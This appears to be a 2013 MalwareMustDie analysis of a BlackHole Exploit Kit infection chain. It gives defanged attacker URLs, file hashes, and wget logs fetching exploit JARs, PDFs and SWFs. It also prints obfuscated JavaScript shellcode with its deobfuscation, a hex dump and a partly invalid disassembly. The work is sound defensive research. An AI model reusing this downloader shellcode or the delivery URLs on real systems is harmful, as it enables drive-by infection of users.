===================================================
#MalwareMustDie!
BlackHole Exploit Kit with Double infector:
Cridex & FakeAV/Ransomer (depends on your request IP)
Infector: h00p://webworks.investorship.co.jp/page-329.htm
Landing page/BHEK: h00p://46.175.224.21:8080/forum/links/public_version.php
All of the cracked infectors download urls:
//JARS
..the applet is fetched from the same URL as the landing page; which JAR comes back depends on the Java User-Agent (2 JARs found)
//PDF:
h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33&aaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
//SWF
h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
//Payloads:
h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r
The catches:
--------------
2013/02/18 15:08 2e9e095f7f276c495a0080b656e81d72 94,208 about.exe
2013/02/18 15:54 80930719764cb6c41840156800ee54f9 7,981 flash1.swf
2013/02/18 15:57 46dd4ea1cdb58bb38488cfbddf40a7cd 1,030 flash2.swf
2013/02/18 15:55 80930719764cb6c41840156800ee54f9 7,981 flash3.swf
2013/02/18 15:57 46dd4ea1cdb58bb38488cfbddf40a7cd 1,030 flash4.swf
2013/02/18 14:31 04022dd9cb3b5c236ec1e0e07d1a6ec1 13,873 java1.jar
2013/02/18 14:33 36df7f936b42abe2ccff75544f08f9f2 12,968 java2.jar
2013/02/18 13:54 96c6c9a9346a360d07236d5bd021adc1 434 page-329.htm
2013/02/18 15:50 6cfb52ab36855801313742a90593c6ec 20,161 pdf1.pdf
2013/02/18 15:50 40e02231bf9ffe321289cccae0191fd4 11,194 pdf2.pdf
2013/02/18 15:51 a57fcffb1040048e63b9f81b6ec096bf 20,161 pdf3.pdf
2013/02/18 15:52 df86cbbc78748287e62be9a1248711ea 11,160 pdf4.pdf
2013/02/18 14:13 b5de89429d354f138d59673e88907b3b 118,326 public_version-2..php
2013/02/18 14:16 a5acd12a633e01d575976de4423b8642 118,301 public_version.php
2013/02/18 15:08 04e9d4167c9a1b82e622e04ad85f8e99 279,040 readme.exe
-----
Total: 4 SWF files (2 unique hashes: flash1=flash3, flash2=flash4), 4 PDF (4 unique hashes), 2 JARs, 2 Payloads
Infector found by @Hulk_Crusader, followed: @unixfreaxjp, GeoIP analysis: @it4sec
=================================================================
// infector:
h00p://webworks.investorship.co.jp/page-329.htm
--2013-02-18 14:11:12-- h00p://webworks.investorship.co.jp/page-329.htm
Resolving webworks.investorship.co.jp... seconds 0.00, 117.20.100.110
Caching webworks.investorship.co.jp => 117.20.100.110
Connecting to webworks.investorship.co.jp|117.20.100.110|:80... seconds 0.00, connected.
:
GET /page-329.htm HTTP/1.0
Host: webworks.investorship.co.jp
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: Mon, 18 Feb 2013 05:11:05 GMT
Server: Apache
Last-Modified: Mon, 18 Feb 2013 04:54:14 GMT
ETag: "1185062d-1b2-5121b3f6"
Accept-Ranges: bytes
Content-Length: 434
Connection: close
Content-Type: text/html
:
200 OK
Length: 434 [text/html]
Saving to: `page-329.htm'
2013-02-18 14:11:12 (9.15 MB/s) - `page-329.htm' saved [434/434]
//-------cat---------------
Please wait
Please wait a moment ... You will be forwarded...
Internet Explorer / Mozilla Firefox compatible only
// -----------landing page (BHEK)----------------------
--2013-02-18 14:13:40-- h00p://46.175.224.21:8080/forum/links/public_version.php
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
:
GET /forum/links/public_version.php HTTP/1.0
Referer: h00p://webworks.investorship.co.jp/page-329.htm
Host: 46.175.224.21:8080
HTTP request sent, awaiting response...
:
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:13:34 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:16:04 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
200 OK
Length: unspecified [text/html]
Saving to: `public_version.php'
2013-02-18 14:16:13 (95.7 KB/s) - `public_version.php' saved [118301]
// -----------------fetch the JARs: same URL, the kit picks the JAR by Java User-Agent---------------------
// old Java (User-Agent Java/1.6.0_23)....
--2013-02-18 14:31:39-- h00p://46.175.224.21:8080/forum/links/public_version.php
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
:
GET /forum/links/public_version.php HTTP/1.0
User-Agent: Java/1.6.0_23
Host: 46.175.224.21:8080
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:31:33 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 13873
ETag: "04022dd9cb3b5c236ec1e0e07d1a6ec1"
Last-Modified: Mon, 18 Feb 2013 05:31:33 GMT
Accept-Ranges: bytes
:
200 OK
Length: 13873 (14K) [application/java-archive]
Saving to: `java1.jar'
2013-02-18 14:31:41 (21.7 KB/s) - `java1.jar' saved [13873/13873]
// newer Java (User-Agent Java/1.7.0_09): a different JAR comes back...
--2013-02-18 14:33:22-- h00p://46.175.224.21:8080/forum/links/public_version.php
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
:
GET /forum/links/public_version.php HTTP/1.0
User-Agent: Java/1.7.0_09
Host: 46.175.224.21:8080
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 05:33:15 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 12968
ETag: "36df7f936b42abe2ccff75544f08f9f2"
Last-Modified: Mon, 18 Feb 2013 05:33:15 GMT
Accept-Ranges: bytes
:
200 OK
Length: 12968 (13K) [application/java-archive]
Saving to: `./java2.jar'
2013-02-18 14:33:23 (41.0 KB/s) - `./java2.jar' saved [12968/12968]
// -------------------------------------------------------
// see both PluginDetect scripts (PD1, PD2)....
// each carries its own shellcode, hence the two payload URLs...
// each script references 2 PDF, 2 SWF and 2 JARs
// PD1.txt : http://pastebin.com/raw.php?i=CpRXS5m3
// and PD2.txt : http://pastebin.com/raw.php?i=MkYVRz4R
// ==========================================================================
// ========================================
// deobfuscate both shellcode strings (reverse, then restore the %u escapes):
// ========================================
var a = "8200!%1482!%0451!%e024!%5185!%7415!%34e0!%5191!%e0c5!%9114!%7421!%2191!%9164!%7421!%2191!%9114!%f421!%2191!%9144!%a121!%21b1!%b1b1!%2421!%5191!%24d4!%e4e0!%2191!%b1a1!%2421!%2191!%9124!%0421!%5191!%64e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
var xxx= a["replace"](/\%!/g, "%" + "u"); // "%!" is the stand-in for the "%u" escape
document.write(xxx);                        // emits the %u-encoded shellcode string
var b = "8200!%a582!%e551!%e0e5!%5185!%5404!%34e0!%5191!%e095!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%f5d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%c5e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
var yyy= b["replace"](/\%!/g, "%" + "u"); // same transform for the second string
document.write("\n\n"+yyy);
// output:
%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e46%u1915%u1240%u4219%u1912%u1242%u1a1b%u1912%u0e4e%u4d42%u1915%u1242%u1b1b%u1b12%u121a%u4419%u1912%u124f%u4119%u1912%u1247%u4619%u1912%u1247%u4119%u5c0e%u1915%u0e43%u5147%u5815%u420e%u1540%u2841%u0028
%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e5c%u1b15%u1218%u4619%u1912%u1241%u4119%u1b12%u0e1b%u4d5f%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u590e%u1915%u0e43%u4045%u5815%u5e0e%u155e%u285a%u0028
// ========================
// shellcode analysis...
// ========================
// unescape both %u strings to raw bytes (each %uXXYY word is stored little-endian, i.e. YY XX)...
// raws (hex view below)...
// view...
41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
e9 03 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
58 40 5c 5c 58 12 07 07 1c 1e 06 19 1f 1d 06 1a X@\\X...........
1a 1c 06 1a 19 12 10 18 10 18 07 4e 47 5a 5d 45 ...........NGZ]E
07 44 41 46 43 5b 07 58 5d 4a 44 41 4b 77 5e 4d .DAFC[.X]JDAKw^M
5a 5b 41 47 46 06 58 40 58 17 5c 4e 15 1b 18 12 Z[AGF.X@X.\N....
19 46 12 19 41 12 19 41 12 1b 1b 0e 5f 4d 15 1a .F..A..A...._M..
5e 12 19 43 12 19 45 12 1b 1a 12 1b 1b 12 19 43 ^..C..E........C
12 19 43 12 1b 19 12 19 42 12 19 47 0e 59 15 19 ..C.....B..G.Y..
43 0e 45 40 15 58 0e 5e 5e 15 5a 28 28 00 C.E@.X.^^.Z((.
//disasm.. NOTE: this listing was produced from the %u words read big-endian, so every byte pair is
// swapped against the hex view above (83 66 fc e4 instead of 66 83 e4 fc) and from offset 4 on it is
// not the real instruction stream. Read in the hex view's byte order the stub is: and sp,0xfffc / cld /
// jmp +0x10 / pop eax / xor ecx,ecx / sub cx,0xfe03 (ecx=0x1fd) / xor byte [eax],0x28 / inc eax /
// loop / jmp +5 / call back to the pop eax: a 509-byte single-byte XOR decoder (key 0x28) whose
// encoded body starts at offset 0x20. The API translation below does contain the URL string that the
// hex view decodes to, so it was run on correctly ordered bytes.
00000000 41 inc ecx
00000001 41 inc ecx
00000002 41 inc ecx
00000003 41 inc ecx
00000004 8366FCE4 and dword [esi-0x4],byte -0x1c
00000008 EBFC jmp short 0x6 ; loop
0000000A 58 pop eax
0000000B 10C9 adc cl,cl
0000000D 31816603E980 xor [ecx-0x7f16fc9a],eax ; decryption
00000013 FE db 0xfe
00000014 2830 sub [eax],dh ; math
00000016 E240 loop 0x58 ; loop
00000018 EBFA jmp short 0x14 ; loop
0000001A E805FFEBFF call dword 0xffebff24 ; call
0000001F FFCC dec esp
00000021 AD lodsd
00000022 1C5D sbb al,0x5d
00000024 77C1 ja 0xffffffe7
00000026 E81BA34C18 call dword 0x184ca346 ; call
0000002B 6868A3A324 push dword 0x24a3a368
00000030 3458 xor al,0x58 ; decryption
00000032 A37E205EF3 mov [0xf35e207e],eax
00000037 1BA34E14765C sbb esp,[ebx+0x5c76144e]
0000003D 2B041B sub eax,[ebx+ebx] ; math
00000040 C6 db 0xc6
00000041 A9383DD7D7 test eax,0xd7d73d38
00000046 A39018686E mov [0x6e681890],eax
0000004B EB2E jmp short 0x7b ; loop
0000004D 11D3 adc ebx,edx
0000004F 5D pop ebp
00000050 1CAF sbb al,0xaf
00000052 AD lodsd
00000053 0C5D or al,0x5d
00000055 CC int3
00000056 C17964C3 sar dword [ecx+0x64],0xc3
0000005A 7E79 jng 0xd5
0000005C 5D pop ebp
0000005D A3A3141D5C mov [0x5c1d14a3],eax
00000062 2B507E sub edx,[eax+0x7e] ; math
00000065 DD5EA3 fstp qword [esi-0x5d]
00000068 2B08 sub ecx,[eax] ; math
0000006A 1BDD sbb ebx,ebp
0000006C 61 popad
0000006D E1D4 loope 0x43
0000006F 692B851BED27 imul ebp,[ebx],dword 0x27ed1b85
00000075 F33896DA10205C rep cmp [esi+0x5c2010da],dl
0000007C E3E9 jecxz 0x67
0000007E 2B2568F2D9C3 sub esp,[dword 0xc3d9f268] ; math
00000084 37 aaa
00000085 13CE adc ecx,esi
00000087 5D pop ebp
00000088 A3760C76F5 mov [0xf5760c76],eax
0000008D 2BA34E63246E sub esp,[ebx+0x6e24634e] ; math
00000093 A5 movsd
00000094 D7 xlatb
00000095 C40C7C les ecx,[esp+edi*2]
00000098 A3242BF0A3 mov [0xa3f02b24],eax
0000009D F5 cmc
0000009E A32CED2B76 mov [0x762bed2c],eax
000000A3 83EB71 sub ebx,byte +0x71 ; math
000000A6 7BC3 jpo 0x6b
000000A8 A385084055 mov [0x55400885],eax
000000AD A81B test al,0x1b
000000AF 242B and al,0x2b
000000B1 5C pop esp
000000B2 C3 ret
000000B3 BEA3DB2040 mov esi,0x4020dba3
000000B8 DFA32D42C071 fbld tword [ebx+0x71c0422d]
000000BE D7 xlatb
000000BF B0D7 mov al,0xd7
000000C1 D7 xlatb
000000C2 D1CA ror edx,1 ; bitwise cipher
000000C4 28C0 sub al,al ; math
000000C6 2828 sub [eax],ch ; math
000000C8 7028 jo 0xf2
000000CA 42 inc edx
000000CB 7840 js 0x10d
000000CD 6828D72828 push dword 0x2828d728
000000D2 AB stosd
000000D3 7831 js 0x106
000000D5 E87D78C4A3 call dword 0xa3c47957 ; call
000000DA 76A3 jna 0x7f
000000DC AB stosd
000000DD 382DEBCBD747 cmp [dword 0x47d7cbeb],ch
000000E3 40 inc eax
000000E4 284640 sub [esi+0x40],al ; math
000000E7 285A5D sub [edx+0x5d],bl ; math
000000EA 45 inc ebp
000000EB 44 inc esp
000000EC D7 xlatb
000000ED 7CAB jl 0x9a
000000EF 3E20EC ds and ah,ch
000000F2 C0A349C0D7D7C3 shl byte [ebx-0x28283fb7],0xc3
000000F9 D7 xlatb
000000FA C3 ret
000000FB 2AA95A2CC428 sub ch,[ecx+0x28c42c5a] ; math
00000101 29A5280C74EF sub [ebp-0x108bf3d8],esp ; math
00000107 240C and al,0xc
00000109 2C4D sub al,0x4d ; math
0000010B 5A pop edx
0000010C 5B pop ebx
0000010D 4F dec edi
0000010E 6C insb
0000010F EF out dx,eax
00000110 2C0C sub al,0xc ; math
00000112 5A pop edx
00000113 5E pop esi
00000114 1A1B sbb bl,[ebx]
00000116 6C insb
00000117 EF out dx,eax
00000118 200C0508085B40 and [eax+0x405b0808],cl
0000011F 7B28 jpo 0x149
00000121 D028 shr byte [eax],1
00000123 287ED7 sub [esi-0x29],bh ; math
00000126 A3241BC079 mov [0x79c01b24],eax
0000012B E16C loope 0x199
0000012D EF out dx,eax
0000012E 2835585F5C4A sub [dword 0x4a5c5f58],dh ; math
00000134 6C insb
00000135 EF out dx,eax
00000136 2D354C0644 sub eax,0x44064c35 ; math
0000013B 44 inc esp
0000013C 6C insb
0000013D EE out dx,al
0000013E 21357128E9A2 and [dword 0xa2e92871],esi
00000144 182C6C sbb [esp+ebp*2],ch
00000147 A02C357969 mov al,[0x6979352c]
0000014C 284228 sub [edx+0x28],al ; math
0000014F 42 inc edx
00000150 7F7B jg 0x1cd
00000152 28427E sub [edx+0x7e],al ; math
00000155 D7 xlatb
00000156 AD lodsd
00000157 3C5D cmp al,0x5d
00000159 E8423E7B28 call dword 0x287b3fa0 ; call
0000015E 7ED7 jng 0x137
00000160 42 inc edx
00000161 2CAB sub al,0xab ; math
00000163 2824C3 sub [ebx+eax*8],ah ; math
00000166 D7 xlatb
00000167 7B2C jpo 0x195
00000169 7EEB jng 0x156
0000016B AB stosd
0000016C C3 ret
0000016D 24C3 and al,0xc3
0000016F 2A6F3B sub ch,[edi+0x3b] ; math
00000172 17 pop ss
00000173 A85D test al,0x5d
00000175 286FD2 sub [edi-0x2e],ch ; math
00000178 17 pop ss
00000179 A85D test al,0x5d
0000017B 2842EC sub [edx-0x14],al ; math
0000017E 42 inc edx
0000017F 28D7 sub bh,dl ; math
00000181 D6 salc
00000182 207EB4 and [esi-0x4c],bh
00000185 C0D7D6 rcl bh,0xd6
00000188 A6 cmpsb
00000189 D7 xlatb
0000018A 2666B0C4 es o16 mov al,0xc4
0000018E A2D6A12629 mov [0x2926a1d6],al
00000193 47 inc edi
00000194 1B95A2E23373 sbb edx,[ebp+0x7333e2a2]
0000019A 6E outsb
0000019B EE out dx,al
0000019C 1E push ds
0000019D 51 push ecx
0000019E 07 pop es
0000019F 324058 xor al,[eax+0x58] ; decryption
000001A2 5C pop esp
000001A3 5C pop esp
000001A4 125807 adc bl,[eax+0x7]
000001A7 07 pop es
000001A8 1E push ds
000001A9 1C19 sbb al,0x19
000001AB 06 push es
000001AC 1D1F1A061C sbb eax,0x1c061a1f
000001B1 1A1A sbb bl,[edx]
000001B3 06 push es
000001B4 1219 adc bl,[ecx]
